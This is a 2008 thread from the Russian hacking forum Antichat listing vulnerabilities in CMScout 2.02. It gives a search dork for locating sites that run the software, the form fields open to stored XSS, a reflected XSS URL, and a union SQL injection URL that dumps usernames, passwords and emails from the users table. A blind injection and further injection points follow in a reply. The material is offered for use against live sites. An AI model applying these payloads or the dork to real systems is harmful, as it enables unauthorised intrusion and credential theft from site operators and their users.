Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   CMScout (https://forum.antichat.xyz/showthread.php?t=63301)

ZAMUT 03.03.2008 04:29
CMScout
 
CMScout

Site: http://cmscout.co.za
Version: 2.02
Dork: "Powered by CMScout"

Active XSS:
CMScout 2.02 forums >> Test Forum >> New Topic
Уязвимые поля: "Subject", "Description"
User Control Panel >> Profile
Уязвимые поля: "First Name", "Last Name", "Contributions"
CMScout Administration
Download Manager
Уязвимые поля:
"Name"
Photo Album Manager
Уязвимые поля: "Name"
Passive XSS
Код:
/index.php?page=forums&f=1&menuid=3[xss]
Remote SQL Injection:
Код:
/admin.php?page=users&subpage=users_view&id=-1+union+select+1,2,concat_ws(0x3a,uname,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+cms_users/*
Нету вывода - забираем данные посимвольно.
Код:
/admin.php?page=group&action=auth&id=1+and+substring(version(),1,1)=5/*
Чтобы узнать полный путь к сайту, можно, как вариант посмотреть логи:

CMScout Administration >> Logfile viewer

(с) ZAMUT

blackybr 04.03.2008 18:44
скули не в админке ( а нафик в админке они собственно нужны?) )

Код:
/index.php?page=polls&id=[sql]&menuid=0
Код:
/getphoto.php?pic=[sql] - посимвольная, либо more one row
там вообще еще куча багов, кто хочет тот найдет. в том числе и php inj


Время: 11:22